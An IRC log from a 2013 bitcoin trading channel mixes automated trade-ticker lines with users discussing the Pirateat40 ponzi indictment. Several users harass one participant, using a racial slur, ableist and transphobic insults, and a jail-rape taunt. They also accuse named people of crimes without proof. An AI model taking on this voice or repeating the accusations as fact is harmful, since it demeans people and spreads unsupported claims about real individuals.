24 03:53:08 but but theymost made me do it! Jul 24 03:53:28 you ran a PT for a ponzi? Jul 24 03:53:33 participated in a 70mil fraud? Jul 24 03:53:33 [BTCTC] [DMS.MINING] 1 @ 0.0121 BTC [+] Jul 24 03:54:05 Chaaaang-Noi: do you really think that one has to commit a crime in the usual sense of the word to be thrown into a U.S. prison? Jul 24 03:54:07 its all over a public forum Jul 24 03:54:17 Chaaaang-Noi, http://grief.com/the-five-stages-of-grief/ Jul 24 03:54:27 chaang noi lol youll go broke just defending the case. evenif you win youll be ruined Jul 24 03:54:45 they dont have to come, Jul 24 03:54:54 [BTCTC] [AMC-PT] 93 @ 0.003832 = 0.3564 BTC [-] Jul 24 03:54:54 royal thai police do it for them and put your pasty white ass on a plane Jul 24 03:55:11 after which youll have to post bail and have your passport revoked Jul 24 03:55:23 and wait for the trial Jul 24 03:55:33 whatever they find you with. Jul 24 03:55:34 chaang. i thought you got publicly hacked and are dead dick broke? Jul 24 03:55:59 chaang noi was a scumbag. and now hes going to pay the price for it Jul 24 03:56:01 you are broke Jul 24 03:56:24 no one is interested. you have no monies Jul 24 03:56:29 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [+] Jul 24 03:56:31 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [+] Jul 24 03:56:32 asciilifeform well on that score, re your earlier example : "there was no evidence that Bout would have committed the crimes for which he was convicted had it not been for the sting operation" Jul 24 03:56:33 [BTCTC] [BASIC-MINING] 3 @ 0.55 = 1.65 BTC [+] Jul 24 03:56:35 [BTCTC] [BASIC-MINING] 26 @ 0.5411 = 14.0686 BTC [-] Jul 24 03:56:39 chaang noi you can have as many passports as you liked once your flagged at the airport as a no fly, you wont escape the US before the trial Jul 24 03:56:45 your wallet got formatted also Jul 24 03:57:04 chaang noi thats not what were claiming Jul 24 03:57:18 YOU ran a pass thru for a large ponzi scheme Jul 24 03:57:32 no Jul 24 03:57:38 because when you get arrested youll never pay it Jul 24 03:57:53 no Jul 24 03:57:57 escrowed means it wont matter if hes in jail Jul 24 03:58:04 not interested in more of your scams chaang noi Jul 24 03:58:09 lol Jul 24 03:58:11 bets and schemes you run Jul 24 03:58:17 [BTCTC] [B.YABMC] 1 @ 0.00256 BTC [-] Jul 24 03:58:22 yes i didnt read the escrow part Jul 24 03:58:39 Chaaaang-Noi, tiberiusix is being kind of moronic but if i were you id at least be a bit frigthened...are you not? Jul 24 03:58:39 chaang noi the only bets you should be concerned with is whose raping you in jail. Jul 24 03:58:59 [BTCTC] [DMS.MINING] 2 @ 0.0121 = 0.0242 BTC [+] Jul 24 03:59:24 why do you say that? Jul 24 03:59:37 dont forget chaang noi vouched for pirate too Jul 24 03:59:56 collecting money for one is. Jul 24 04:00:00 [MPEX] [S.MPOE] 3226 @ 0.00080053 = 2.5825 BTC [-] Jul 24 04:00:01 [MPEX] [S.MPOE] 7129 @ 0.00080052 = 5.7069 BTC [-] Jul 24 04:00:04 but is operating as a passthrough that is a ponzi illegal? Jul 24 04:00:19 you collected btc didnt you? Jul 24 04:00:29 oh i must not know how you operated then Jul 24 04:00:44 lol, cmon its obviously one. what shred of doubt do you have? Jul 24 04:01:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.04523 BTC [-] Jul 24 04:01:58 hmm id be willing to bet my entire life savings it was a ponzi Jul 24 04:01:59 the plot thickens Jul 24 04:02:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.04523 = 0.2262 BTC [-] Jul 24 04:02:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.04523 = 0.4523 BTC [-] Jul 24 04:02:40 chaang you are being trolled like a bitch Jul 24 04:03:12 "24. Jul 24 04:03:12 In August 2012, as the scheme collapsed, Shavers made preferential redemptions Jul 24 04:03:12 to friends and longtime BTCST investors. Jul 24 04:03:12 " Jul 24 04:03:17 that's actually pretty bad, because we Jul 24 04:03:21 will be getting names. Jul 24 04:03:47 so there you'll see, gigavps, goat, prolly theymos, prolly half the wot list of p eople who had him +d Jul 24 04:03:51 that'll be the drama. Jul 24 04:03:59 yep Jul 24 04:04:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.04652 = 0.093 BTC [+] Jul 24 04:04:14 goat + theymost + pirate Jul 24 04:04:16 the 3 stooges Jul 24 04:06:13 [BTCTC] [AMC-PT] 125 @ 0.00385 = 0.4813 BTC [+] Jul 24 04:08:19 [BTCTC] [COGNITIVE] 2 @ 0.7505 = 1.501 BTC [-] Jul 24 04:09:06 chaang noi how stupid were you to believe 7% a week is possible anyway? as that is higher then the bitcoin growth rate itself Jul 24 04:09:26 [BTCTC] [TAT.MINIGAME] 2179 @ 0.000315 = 0.6864 BTC [+] Jul 24 04:09:37 [HAVELOCK] [HIM] 5 @ 0.228 = 1.14 BTC [+] Jul 24 04:09:43 sure you can. Jul 24 04:09:59 you cant make consistent 7% week in week out and pay out in BTC Jul 24 04:10:05 its mathematically impossible Jul 24 04:10:23 no they collect commission Jul 24 04:10:33 like a skim Jul 24 04:10:46 how did you ever believe pirate could do 7% a week in compound interest? Jul 24 04:10:57 when at the time only like 6mil bitcoins existed? Jul 24 04:11:12 [BTCTC] [AMC-PT] 107 @ 0.003832 = 0.41 BTC [-] Jul 24 04:11:14 [BTCTC] [AMC-PT] 203 @ 0.003832 = 0.7779 BTC [-] Jul 24 04:11:17 [BTCTC] [AMC-PT] 1425 @ 0.00383 = 5.4578 BTC [-] Jul 24 04:11:21 [BTCTC] [AMC-PT] 250 @ 0.00383 = 0.9575 BTC [-] Jul 24 04:12:11 [HAVELOCK] [AM100] 5 @ 0.0445 = 0.2225 BTC [+] Jul 24 04:12:13 [HAVELOCK] [AM100] 40 @ 0.0445887 = 1.7835 BTC [+] Jul 24 04:12:36 its amazing how stupid people keep applying fiat credit rules to bitcoin Jul 24 04:13:27 [HAVELOCK] [AM100] 8 @ 0.0445887 = 0.3567 BTC [+] Jul 24 04:13:40 [MPEX] [S.MPOE] 7462 @ 0.00080077 = 5.9753 BTC [+] Jul 24 04:15:17 sure is Jul 24 04:16:30 [BTCTC] [DMS.MINING] 80 @ 0.0119 = 0.952 BTC [-] Jul 24 04:16:59 [BTCTC] [DMS.MINING] 87 @ 0.01166 = 1.0144 BTC [-] Jul 24 04:17:01 [BTCTC] [ASICMINER-PT] 3 @ 4.738 = 14.214 BTC [+] Jul 24 04:17:05 [BTCTC] [AMC-PT] 40 @ 0.00379 = 0.1516 BTC [-] Jul 24 04:17:15 [BTCTC] [AMC-PT] 1934 @ 0.00379 = 7.3299 BTC [-] Jul 24 04:18:41 During the relevant period, Shavers obtained at least 700,467 BTC in principal investments ; During the relevant period, Shavers returned at least 507,148 BTC to BTCST investors as withdrawals or purported interest payments. Jul 24 04:18:52 whoa, so he quit way ahead of reaching the magical 4% ?! Jul 24 04:19:24 During the relevant period, Shavers transferred at least 150,649 BTC to his personal account at an online BTC currency exchange which, among other things, he then sold or used to day-trade (converting BTC to U.S. dollars and vice versa). As a result of this activity, Shavers suffered a net loss from his day-trading, but realized net proceeds of $164,758 from his net sales of 86,202 BTC. Jul 24 04:19:27 ahahaa dude. Jul 24 04:19:28 lmao Jul 24 04:19:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.04651 = 0.2326 BTC [-] Jul 24 04:20:26 During the relevant period, Shavers transferred $147,102 from his personal account at the online BTC currency exchange to accounts he controlled at an online payment processor and his personal checking account, which he then used for, among other things, his personal expenses, including rent, car-related expenses, utilities, retail purchases, casinos, and meals. Jul 24 04:20:42 [BTCTC] [AMC-PT] 10 @ 0.00378 = 0.0378 BTC [-] Jul 24 04:20:44 [BTCTC] [AMC-PT] 40 @ 0.00379 = 0.1516 BTC [+] Jul 24 04:20:44 too good stuff. i dunno why the us govt has such a bad name, it delivers. Jul 24 04:20:45 [BTCTC] [AMC-PT] 15 @ 0.00383 = 0.0575 BTC [+] Jul 24 04:22:17 hehe interesting how chaang noi indictment will look like Jul 24 04:22:40 [BTCTC] [DMS.SELLING] 315 @ 0.0205 = 6.4575 BTC [-] Jul 24 04:22:47 White trash kid from America spent his time in dive tranny bars in Bangkok and Pataya Jul 24 04:23:18 Told his many wives families he was a up and coming wall street investor. Jul 24 04:23:36 [BTCTC] [AMC-PT] 75 @ 0.00385 = 0.2888 BTC [+] Jul 24 04:23:38 [BTCTC] [AMC-PT] 1 @ 0.003851 BTC [+] Jul 24 04:23:51 [BTCTC] [AMC-PT] 26 @ 0.00383 = 0.0996 BTC [-] Jul 24 04:24:24 chaang noi I still cant believe how utterly stupid you were thinking someone would pay you 7% a week on bitcoin lol Jul 24 04:25:24 [BTCTC] [DMS.SELLING] 48 @ 0.02099 = 1.0075 BTC [+] Jul 24 04:25:39 [BTCTC] [BASIC-MINING] 1 @ 0.5899 BTC [+] Jul 24 04:25:52 [BTCTC] [COGNITIVE] 21 @ 0.7505 = 15.7605 BTC [-] Jul 24 04:25:54 [BTCTC] [COGNITIVE] 4 @ 0.7505 = 3.002 BTC [-] Jul 24 04:25:55 i think the second dumbest in the chan is mjr Jul 24 04:26:08 thinking he can have 1000 man gatherings in central park for open outcry bitcoin trading Jul 24 04:26:40 how about that guy that keeps bleating the same shit to an internet full of people wit him on ignore Jul 24 04:26:51 [MPEX] [S.MPOE] 2521 @ 0.00080052 = 2.0181 BTC [-] Jul 24 04:26:53 [MPEX] [S.MPOE] 2902 @ 0.00079979 = 2.321 BTC [-] Jul 24 04:26:59 [BTCTC] [AMC-PT] 9 @ 0.00383 = 0.0345 BTC [-] Jul 24 04:27:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.04651 = 0.2326 BTC [-] Jul 24 04:28:34 dub the idiot who bought sdice at 0.070 Jul 24 04:29:46 [BTCTC] [COGNITIVE] 6 @ 0.7505 = 4.503 BTC [-] Jul 24 04:29:49 [BTCTC] [COGNITIVE] 13 @ 0.7503 = 9.7539 BTC [-] Jul 24 04:29:51 [BTCTC] [COGNITIVE] 10 @ 0.7502 = 7.502 BTC [-] Jul 24 04:29:52 [BTCTC] [COGNITIVE] 1 @ 0.7451 BTC [-] Jul 24 04:29:54 [BTCTC] [COGNITIVE] 1 @ 0.74 BTC [-] Jul 24 04:29:55 [BTCTC] [COGNITIVE] 4 @ 0.735 = 2.94 BTC [-] Jul 24 04:29:56 [BTCTC] [COGNITIVE] 22 @ 0.73499 = 16.1698 BTC [-] Jul 24 04:29:59 [BTCTC] [COGNITIVE] 1 @ 0.7 BTC [-] Jul 24 04:30:01 [BTCTC] [COGNITIVE] 5 @ 0.7 = 3.5 BTC [-] Jul 24 04:30:03 [BTCTC] [COGNITIVE] 5 @ 0.7 = 3.5 BTC [-] Jul 24 04:30:32 [BTCTC] [COGNITIVE] 3 @ 0.699999 = 2.1 BTC [-] Jul 24 04:31:10 lol Jul 24 04:31:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.04651 = 0.093 BTC [-] Jul 24 04:31:47 you showed so much promise at first bro Jul 24 04:32:04 yea bro Jul 24 04:32:10 but parroting the same stupid shit over and over again just isnt trolling Jul 24 04:32:20 dub shut up, you were another 2 bit idiot who thought you could get rich off of sdice Jul 24 04:33:23 well i didnt lose 40k bitcoins Jul 24 04:33:30 for promises of 7% a week lol Jul 24 04:33:36 how did you even think that was possible Jul 24 04:33:48 you realize you are like almost 10% of the losses? Jul 24 04:33:59 the DUMBEST participant Jul 24 04:34:10 then went and incriminated himself by being involved in the crime too Jul 24 04:34:18 2 for 2 Jul 24 04:35:10 chaaang-noi: in your case you could please incompetance due to mental retardation, becuase no jury will believe a rational person would be that dumb. Jul 24 04:38:17 theymos will give you legal advice Jul 24 04:38:52 chaang noi what did theymos promise you for operating the pass thru? Jul 24 04:39:25 [BTCTC] [ASICMINER-PT] 3 @ 4.738 = 14.214 BTC [+] Jul 24 04:39:32 a turn on nefario Jul 24 04:39:38 lol Jul 24 04:39:44 [BTCTC] [B.YABMC] 1 @ 0.00256 BTC [-] Jul 24 04:39:52 theymos told him he could be on the recieving end this time Jul 24 04:40:16 [BTCTC] [AMC-PT] 1 @ 0.00383 BTC [-] Jul 24 04:41:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.04651 = 0.4651 BTC [-] Jul 24 04:45:11 [BTCTC] [DMS.MINING] 40 @ 0.012 = 0.48 BTC [+] Jul 24 04:48:24 [BTCTC] [COGNITIVE] 1 @ 0.7 BTC [+] Jul 24 04:48:26 [BTCTC] [COGNITIVE] 2 @ 0.699999 = 1.4 BTC [-] Jul 24 04:48:28 [BTCTC] [COGNITIVE] 3 @ 0.685 = 2.055 BTC [-] Jul 24 04:48:29 [BTCTC] [COGNITIVE] 3 @ 0.66667 = 2 BTC [-] Jul 24 04:48:31 [BTCTC] [COGNITIVE] 1 @ 0.66 BTC [-] Jul 24 04:48:32 [BTCTC] [COGNITIVE] 5 @ 0.65 = 3.25 BTC [-] Jul 24 04:49:27 [BTCTC] [TAT.ASICMINER] 15 @ 0.04651 = 0.6977 BTC [-] Jul 24 04:49:51 [BTCTC] [ASICMINER-PT] 1 @ 4.741 BTC [+] Jul 24 04:50:24 paulsproge: SEC Director Considers Bitcoin As "Investment", Digital Currency Regulated Alongside Tra Jul 24 04:50:29 [BTCTC] [ASICMINER-PT] 1 @ 4.749 BTC [+] Jul 24 04:50:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.04651 = 0.1395 BTC [-] Jul 24 04:51:56 [BTCTC] [BASIC-MINING] 1 @ 0.5421 BTC [-] Jul 24 04:51:58 [BTCTC] [BASIC-MINING] 3 @ 0.5421 = 1.6263 BTC [-] Jul 24 04:52:00 [BTCTC] [BASIC-MINING] 1 @ 0.542 BTC [-] Jul 24 04:52:01 [BTCTC] [BASIC-MINING] 3 @ 0.5411 = 1.6233 BTC [-] Jul 24 04:52:03 [BTCTC] [BASIC-MINING] 10 @ 0.541 = 5.41 BTC [-] Jul 24 04:52:05 [BTCTC] [BASIC-MINING] 3 @ 0.54 = 1.62 BTC [-] Jul 24 04:52:07 [BTCTC] [BASIC-MINING] 5 @ 0.5212 = 2.606 BTC [-] Jul 24 04:52:16 [BTCTC] [BASIC-MINING] 2 @ 0.5211 = 1.0422 BTC [-] Jul 24 04:52:18 [BTCTC] [BASIC-MINING] 10 @ 0.5211 = 5.211 BTC [-] Jul 24 04:52:20 [BTCTC] [BASIC-MINING] 14 @ 0.5211 = 7.2954 BTC [-] Jul 24 04:52:21 [BTCTC] [BASIC-MINING] 28 @ 0.521 = 14.588 BTC [-] Jul 24 04:53:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.0465 = 0.093 BTC [-] Jul 24 04:53:45 chaang noi: best thing for you is to fall off the map for a few months Jul 24 04:54:15 [BTCTC] [ASICMINER-PT] 2 @ 4.754 = 9.508 BTC [+] Jul 24 04:54:17 [BTCTC] [ASICMINER-PT] 2 @ 4.78 = 9.56 BTC [+] Jul 24 04:54:18 ppl were already naming you in threads Jul 24 04:54:18 [BTCTC] [ASICMINER-PT] 2 @ 4.79 = 9.58 BTC [+] Jul 24 04:54:54 how do you pronounce sproge? Jul 24 04:55:08 sprow gay? Jul 24 04:55:21 chang noi you admitted that theymos profited and you helped theymos move funds Jul 24 04:55:49 yes Jul 24 04:55:57 and you also said his money was the only one you moved Jul 24 04:56:10 or that the reason for the pass thru was for theymos to gain exposure Jul 24 04:56:26 where did i lie? Jul 24 04:56:37 so what did theymos order you to do ? Jul 24 04:56:41 start a pass thru? Jul 24 04:56:57 why did theymos want you specifically to run a pirate pass thru Jul 24 04:58:50 Or if it is a ponzi, then the vast majority of pirate backers were given an incentive to pretend to believe him. I might believe Goat is stupid enough to be fooled by pirate, but I will not believe that from most of the others. IOW, if this unfolds like it appears it will, they would be knowing accomplices. And very effective ones at that. -- lol! How was I fooled by pirate? Explain that p4man or did you just fool yourself? :) Jul 24 04:59:13 lol chaang even after you lost 40k you still didnt realize you were conned. Jul 24 04:59:21 [BTCTC] [ASICMINER-PT] 6 @ 4.799 = 28.794 BTC [+] Jul 24 04:59:49 chaang i love how you always go on the defensive everytime and try to reverse question someone that makes a comment about you Jul 24 05:00:08 someone calls you a fool(backed by evidence) and you simply deny being one and call the accusor a fool Jul 24 05:00:27 hes just a fucking newbie goat Jul 24 05:00:29 P4man: If you werent fooled, then either you are still convinced pirate will pay out in full, or you are saying that you knew all along. Which is it? Jul 24 05:00:33 [BTCTC] [ASICMINER-PT] 1 @ 4.8 BTC [+] Jul 24 05:00:38 dub hey, dio you have the chatlkog where pirate was "maniopulating the price" Jul 24 05:00:44 and all the forum retards were like ooooo Jul 24 05:01:00 Even if you had a brain, I cant look in to yours. The issue here is not if I am sure, a more interesting question is if you are since you have been on the take and convinced countless people to deposit. So are you saying you scammed them knowingly or that you still stand behind pirate? Jul 24 05:01:04 mircea_popescu: what am I, PRISM? Jul 24 05:01:08 yes. Jul 24 05:01:11 you are prism. Jul 24 05:01:13 deal! Jul 24 05:01:26 pigeons do you ? Jul 24 05:01:32 chaang-noi: so there are other people on the forum stating you were convincing people to participate in the ponzi Jul 24 05:01:33 let me look Jul 24 05:01:59 [BTCTC] [TAT.ASICMINER] 29 @ 0.04651 = 1.3488 BTC [+] Jul 24 05:02:06 Lets make a list with who is on the payroll of pirate or has any personal interest in any of his operations: - Chaang Noi (Goat) ช้างน้อย (runs PiratePassThrough Bond or is affiliated with one) - BurtW (runs PiratePassThrough Bond or is affiliated with one) - PatrickHarnett (runs PiratePassThrough Bond or is affiliated with one) - dollartrader (runs PiratePassThrough Bond or is affiliated with one) - hashking (runs PiratePassTh Jul 24 05:03:20 no only the stupid people Jul 24 05:03:27 and it was only a handful who helped pirate40 Jul 24 05:03:42 chaang-noi was up there with theymos as number 2 and 3 participation wise Jul 24 05:04:04 chaang noi not only had 40k of his own bitcoin invested he was recruiting people Jul 24 05:04:20 yea but that wasnt their job. Jul 24 05:04:29 their job was to make the ponzi accessible to new investors Jul 24 05:04:42 can we just ban or agree to ignore this nig Jul 24 05:04:56 we don't need some child dredging up a forum version of history Jul 24 05:04:57 ban me for what dub? Jul 24 05:05:03 we were here, he wasnt Jul 24 05:05:15 chang noi is a criminal accomplice to a 70 million dollar ponzi scheme Jul 24 05:05:19 along with forum owner theymos Jul 24 05:05:20 tiberiusix: for being shit at trolling Jul 24 05:05:23 thestringpuller: yep Jul 24 05:05:42 I even bought up some debt Jul 24 05:05:42 thestringpuller: dub is a retard he bought sdice at 0.07 of course he had pirate exposure. Jul 24 05:06:19 LOL Jul 24 05:06:34 i know Jul 24 05:06:38 not denying that Jul 24 05:06:41 [BTCTC] [DMS.MINING] 29 @ 0.012 = 0.348 BTC [+] Jul 24 05:06:47 its just funn that he was a bagholder countless times at this point Jul 24 05:06:50 funny* Jul 24 05:07:14 yea but not 3-4 times Jul 24 05:07:19 on the same scams Jul 24 05:07:40 http://trilema.com/2013/trendon-shavers-aka-pirateat40-indicted/ Jul 24 05:07:42 so there. Jul 24 05:07:43 Trendon Shavers aka Pirateat40 indicted pe Trilema - Un blog de Mircea Popescu. Jul 24 05:08:52 mircea_popescu: it was in #bitcoin that manipulation shit went down, fuck looking for it Jul 24 05:09:00 [BTCTC] [TAT.ASICMINER] 12 @ 0.04651 = 0.5581 BTC [+] Jul 24 05:09:03 a well. Jul 24 05:09:09 https://bitcointalk.org/index.php?topic=82572.0 Jul 24 05:09:13 mebbe a link surfaces in the comments. Jul 24 05:09:17 Idea for a BS&T security Jul 24 05:09:23 evidence of pirate engaging in the ponzi scheme for a "fee" Jul 24 05:09:39 I can do it if the fee is reasonable. What would a reasonable fee be? Thanks. Jul 24 05:09:44 err of chaang noi* Jul 24 05:10:07 6.2% weekly seem fair to everyone? Thanks Jul 24 05:10:19 lol even skimming a portfion of the rate for himself Jul 24 05:10:48 anybody here own shares of btcquick? Jul 24 05:11:10 [BTCTC] [DMS.SELLING] 2 @ 0.02099 = 0.042 BTC [+] Jul 24 05:11:30 https://bitcointalk.org/index.php?topic=82572.40 <--- theymos publicly admitting to profitting from the scam and chaang-noi congratulating him on it. Jul 24 05:11:33 Idea for a BS&T security Jul 24 05:12:48 [BTCTC] [AMC-PT] 10 @ 0.00367 = 0.0367 BTC [-] Jul 24 05:13:51 [BTCTC] [TAT.ASICMINER] 12 @ 0.04523 = 0.5428 BTC [-] Jul 24 05:14:01 [BTCTC] [AMC-PT] 20 @ 0.003671 = 0.0734 BTC [+] Jul 24 05:14:03 [BTCTC] [AMC-PT] 33 @ 0.00367 = 0.1211 BTC [-] Jul 24 05:14:13 Hiro2 i didn't even know it had shares. Jul 24 05:15:03 Yeah, on BitFunder Jul 24 05:15:29 I'm hoping they'll be big Jul 24 05:15:36 mircea_popescu: some of that loss would be during tat event though Jul 24 05:15:41 that* Jul 24 05:16:07 he was raging about the rally, telling people to stop buying or he would fuck the market up Jul 24 05:16:11 yeah Jul 24 05:16:34 then sold massively and didnt make a dent in the rally Jul 24 05:16:35 kinda ridiculous if you think about it. Jul 24 05:16:39 tiberiusix: that sucks, I thought theymos was more of a reasonable guy... but then again he is only... 20? Jul 24 05:16:48 [BTCTC] [ASICMINER-PT] 1 @ 4.71 BTC [-] Jul 24 05:16:53 [BTCTC] [ASICMINER-PT] 1 @ 4.71 BTC [-] Jul 24 05:16:58 theymos is an unmitigated fucktard Jul 24 05:17:23 thestringpuller you're probably right Jul 24 05:17:35 Damn, Theymos is younger than me? Jul 24 05:17:45 Chaaaang-Noi how much did you lose? Jul 24 05:17:55 23 Jul 24 05:18:29 yeah theymos is college age. Jul 24 05:19:10 hey Chaaaang-Noi https://bitcointalk.org/index.php?topic=108282.0 Jul 24 05:19:21 did the "update: see this thread" link get deleted? Jul 24 05:19:50 hmm Jul 24 05:19:55 the link in the post Jul 24 05:20:21 orly? Jul 24 05:20:27 [BTCTC] [AMC-PT] 20 @ 0.00383 = 0.0766 BTC [+] Jul 24 05:20:40 [BTCTC] [AMC-PT] 45 @ 0.00383 = 0.1724 BTC [+] Jul 24 05:20:43 [HAVELOCK] [AM100] 40 @ 0.0445887 = 1.7835 BTC [+] Jul 24 05:21:10 [BTCTC] [AMC-PT] 35 @ 0.00387 = 0.1355 BTC [+] Jul 24 05:21:16 [HAVELOCK] [AM100] 94 @ 0.0445887 = 4.1913 BTC [+] Jul 24 05:21:30 [HAVELOCK] [AM100] 50 @ 0.0445888 = 2.2294 BTC [+] Jul 24 05:21:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.04651 = 0.4651 BTC [+] Jul 24 05:21:37 what do you expect from a libertard Jul 24 05:21:47 [HAVELOCK] [AM100] 221 @ 0.04479989 = 9.9008 BTC [+] Jul 24 05:21:47 Bitcoin Ponzi Scheme Alleged by SEC in Lawsuit Against Texas Man - Bloomberg Jul 24 05:21:53 ya.. read that Jul 24 05:22:14 why Jul 24 05:22:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.04651 BTC [+] Jul 24 05:22:25 he's even advertising that he cannot be trusted in his name Jul 24 05:23:04 that was the guy with the cartman avatar right? Jul 24 05:23:45 [HAVELOCK] [HIM] 1 @ 0.23 BTC [+] Jul 24 05:23:51 what do you guys think of coinlenders? Jul 24 05:24:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.04651 = 0.1395 BTC [+] Jul 24 05:25:14 Put some funds in BTC-BOND. Jul 24 05:25:27 2 Jul 24 05:25:43 I got a good portfolio to guarantee I can make payments on my loan. Jul 24 05:27:36 is there a good website to view the stock charts neater? Jul 24 05:28:55 try coinfow.co Jul 24 05:29:35 webpage unavailable Jul 24 05:30:11 flow* Jul 24 05:30:12 whoops Jul 24 05:30:18 coinflow.co Jul 24 05:30:24 difficult domain Jul 24 05:30:51 publio OMG thank you! Jul 24 05:30:53 looks awesome Jul 24 05:31:19 yvw! Jul 24 05:31:59 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003259 = 0.0326 BTC [+] Jul 24 05:33:38 does bitfunder email you when there's dividends? Jul 24 05:37:09 [BTCTC] [S.BBET-PT] 1 @ 0.002029 BTC [+] Jul 24 05:38:13 [BTCTC] [DMS.PURCHASE] 9 @ 0.03309 = 0.2978 BTC [-] Jul 24 05:38:56 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003238 = 0.0324 BTC [-] Jul 24 05:39:53 [BTCTC] [LTC-ATF.B2] 1 @ 0.01011 BTC [-] Jul 24 05:41:19 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003238 = 0.0324 BTC [-] Jul 24 05:41:56 [BTCTC] [TAT.MINIGAME] 2 @ 0.0005 = 0.001 BTC [+] Jul 24 05:42:41 [BTCTC] [TAT.MINIGAME] 19 @ 0.0005 = 0.0095 BTC [+] Jul 24 05:45:11 [BTCTC] [TAT.MINIGAME] 73 @ 0.0005 = 0.0365 BTC [+] Jul 24 05:46:42 [BTCTC] [TAT.MINIGAME] 80 @ 0.0005 = 0.04 BTC [+] Jul 24 05:47:04 chaangnoi how are you 30's when you look 12 in your forum photo Jul 24 05:49:06 i guess mircea will go on as the longest running scam in bitcoin Jul 24 05:49:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.04651 = 0.2326 BTC [+] Jul 24 05:49:41 I guess we Jul 24 05:50:07 'll never know why you feel the need to shit out your dumbass opinions here Jul 24 05:50:29 since you're clearly not trolling, its acutal retardation Jul 24 05:50:35 dub im sorry i thought you were intelligent Jul 24 05:50:44 after finding out you fell for 3-4 scams Jul 24 05:50:49 you are just as dumb as the rest Jul 24 05:52:46 [BTCTC] [DMS.MINING] 28 @ 0.01243 = 0.348 BTC [+] Jul 24 05:52:49 [BTCTC] [DMS.MINING] 79 @ 0.01244 = 0.9828 BTC [+] Jul 24 05:52:51 [BTCTC] [DMS.MINING] 21 @ 0.01249 = 0.2623 BTC [+] Jul 24 05:52:52 [BTCTC] [DMS.MINING] 35 @ 0.0125 = 0.4375 BTC [+] Jul 24 05:56:14 [HAVELOCK] [AM100] 224 @ 0.04410001 = 9.8784 BTC [-] Jul 24 05:57:06 [BTCTC] [DMS.MINING] 232 @ 0.0125 = 2.9 BTC [+] Jul 24 05:58:47 [BTCTC] [DMS.MINING] 10 @ 0.0126 = 0.126 BTC [+] Jul 24 06:00:27 [BTCTC] [DMS.MINING] 50 @ 0.0126 = 0.63 BTC [+] Jul 24 06:00:28 [BTCTC] [AMC-PT] 13 @ 0.00385 = 0.0501 BTC [-] Jul 24 06:01:04 anyone else confused about TAT.MINIGAME? Jul 24 06:01:19 [BTCTC] [DMS.MINING] 40 @ 0.0127 = 0.508 BTC [+] Jul 24 06:01:35 dub I am Jul 24 06:01:44 not sure exactly what games they are going to develop Jul 24 06:01:56 or for where for that matter Jul 24 06:02:02 looks like tat put in two big asks at 29 and 3something Jul 24 06:02:15 but before that there was a handful of buys at 5 Jul 24 06:02:25 [BTCTC] [TAT.MINIGAME] 3676 @ 0.0005 = 1.838 BTC [+] Jul 24 06:02:25 then the big 3something ask got pulled Jul 24 06:02:34 after the 29 sold in one hit Jul 24 06:02:46 [BTCTC] [TAT.MINIGAME] 8 @ 0.00532 = 0.0426 BTC [+] Jul 24 06:03:17 o its the other way up Jul 24 06:04:45 still, why did the second ask get pulled Jul 24 06:07:42 catching up, Jul 24 06:07:51 http://trilema.com/2013/trendon-shavers-aka-pirateat40-indicted/ enjoyed this. Jul 24 06:08:03 aha Jul 24 06:10:39 I'm out of SMG atm Jul 24 06:11:13 apologies dub Jul 24 06:11:17 [BTCTC] [TAT.ASICMINER] 13 @ 0.04651 = 0.6046 BTC [+] Jul 24 06:11:30 doesnt acutally answer the question Jul 24 06:11:44 whats the Q Jul 24 06:11:58 where did te 10k at 3somethign ask go Jul 24 06:12:26 someone pulled it I assume Jul 24 06:13:06 people have 'pre pt ipo' sares? Jul 24 06:13:10 no Jul 24 06:13:15 [BTCTC] [TAT.MINIGAME] 100 @ 0.001 = 0.1 BTC [-] Jul 24 06:13:16 (yes my h key is broken) Jul 24 06:13:24 then only you could have placed the ask Jul 24 06:13:40 you mean in the opening moments? Jul 24 06:13:44 yes Jul 24 06:13:57 well I sell across 3 exchanges Jul 24 06:14:19 so I removed to sell on BF if I recall Jul 24 06:14:31 right Jul 24 06:14:46 [BTCTC] [DMS.MINING] 26 @ 0.013 = 0.338 BTC [+] Jul 24 06:14:54 so what you're saying is TAT investments is a really bad deal unless you are TAT :) Jul 24 06:15:14 :P Jul 24 06:15:31 [BTCTC] [DMS.MINING] 33 @ 0.0131 = 0.4323 BTC [+] Jul 24 06:15:37 really my mistake here is not having opened a real mpex account yet Jul 24 06:15:44 to buy more rapidly Jul 24 06:15:52 than jurov allows me at coinbr Jul 24 06:16:08 actually I think there is a bigger mistake Jul 24 06:16:17 you're representing yourself as providing pass throughs Jul 24 06:16:29 when you're actually arbing other peopls money into your pocket Jul 24 06:16:56 because I am selling higher than mpex? Jul 24 06:17:24 hmmmm, the plot doth thicken : http://trilema.com/2013/trendon-shavers-aka-pirateat40-indicted/#comment-94068 Jul 24 06:18:11 you're doing something akin to but well beyond front running Jul 24 06:19:04 [BTCTC] [TAT.MINIGAME] 40 @ 0.001 = 0.04 BTC [-] Jul 24 06:20:14 for one, only you know how much of a given asset is available on a given market and you appear to move that around based on where you will profit best Jul 24 06:20:30 i actually profited less Jul 24 06:20:34 on BF Jul 24 06:20:42 than if I had left the ask up Jul 24 06:20:47 it doesnt matter, you said yourself that you moved it to get a better price Jul 24 06:20:54 you said that Jul 24 06:20:55 not me Jul 24 06:21:22 ok Jul 24 06:21:36 still doesnt change anything Jul 24 06:21:41 [HAVELOCK] [AM100] 5 @ 0.0441 = 0.2205 BTC [-] Jul 24 06:23:30 mircea_popescu: interdasting Jul 24 06:23:37 I'll be submitting for a direct mpex account post-haste Jul 24 06:23:47 and then I'll have shares for sale everywhere again Jul 24 06:23:58 anyone can also buy shares Jul 